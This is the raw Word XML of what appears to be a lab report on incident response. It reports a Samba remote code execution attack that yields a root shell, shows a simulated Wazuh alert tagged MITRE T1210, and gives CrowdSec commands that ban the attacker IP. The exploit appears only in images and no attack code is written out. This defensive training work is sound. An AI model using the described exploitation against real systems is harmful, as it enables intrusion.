    <w:p w14:paraId="47586BB4" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04277DA4" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E53D06A" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016DEB68" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD23F5D" w14:textId="7A0BB60B" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attack Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19937B6B" w14:textId="4EB497B7" w:rsidR="00E6742E" w:rsidRPr="00FB108F" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012D35DB" wp14:editId="75E0EBB4">
            <wp:extent cx="5736590" cy="1396365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19923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4951" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5736590" cy="1396365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="255B6BD7" w14:textId="6B08CB24" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BC95F9" wp14:editId="7D8AA4B3">
            <wp:extent cx="4713241" cy="2564765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="20395416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686" t="7439" r="7708" b="22687"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4736751" cy="2577558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89C2E3" w14:textId="561546C9" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attack success: Root shell obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB18E4E" w14:textId="79793627" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>2. DETECTION &amp; TRIAGE (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D1309" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A972FC" w14:textId="72B67A41" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> log entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61217E57" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>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757"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="3222"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E6742E" w:rsidRPr="00E6742E" w14:paraId="2959C5D2" w14:textId="77777777" w:rsidTr="00E6742E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36523213" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A57D4CD" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="668B8467" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Alert Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3177" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11634BA5" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E6742E" w:rsidRPr="00E6742E" w14:paraId="3B23C159" w14:textId="77777777" w:rsidTr="00E6742E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7406CAB3" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2025-08-18 14:00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="439B24D2" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E0666E" w14:textId="69648564" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Samba remote</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>code execution attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3177" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C65126" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E6742E">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1210 – Exploitation of Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002710E7" w:rsidRPr="00E6742E" w14:paraId="28BDC230" w14:textId="77777777" w:rsidTr="00E6742E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38E363E5" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63467DAC" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="679DC6F0" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="00E6742E" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1727" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F173F25" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="602E7C53" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AE5C04D" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="00E6742E" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2238" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B0F1F04" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="00E6742E" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3177" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E25BC83" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="00E6742E" w:rsidRDefault="002710E7" w:rsidP="00E6742E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CFECFC3" w14:textId="7458A1B0" w:rsidR="00E6742E" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073FCD1C" wp14:editId="35AC5B80">
            <wp:extent cx="5372850" cy="1152686"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="45187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78178" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5372850" cy="1152686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24247A9F" wp14:editId="49727FC1">
            <wp:extent cx="4422570" cy="2948380"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="14115372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1527" cy="2954351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00580BCE" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CFBC6F" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>3. RESPONSE &amp; CONTAINMENT (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CC431" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 1: Ban attacker IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017F6BCA" w14:textId="3D205F66" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>cscli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> decisions add --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.101 --reason "Samba exploit attempt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1056CBA6" w14:textId="77777777" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390342B4" w14:textId="7CF3460C" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BD32309" wp14:editId="0DF3E0AC">
            <wp:extent cx="3820058" cy="314369"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14020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6108" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3820058" cy="314369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69EAA2" w14:textId="387B8376" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 2: Verify with ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC149F" w14:textId="2C5C26F0" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;ping 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D15358" w14:textId="6DB75AE5" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E26F349" wp14:editId="2750072C">
            <wp:extent cx="3886742" cy="1267002"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="136296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63352" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3886742" cy="1267002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26B902" w14:textId="41F13F21" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Here </w:t>
      </w:r>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Destination Host Prohibited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF2981" w14:textId="74C6EF23" w:rsidR="002710E7" w:rsidRPr="002710E7" w:rsidRDefault="002710E7" w:rsidP="002710E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002710E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attacker successfully blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7534A965" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9FB8CE" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F4F252" w14:textId="77777777" w:rsidR="002710E7" w:rsidRDefault="002710E7" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
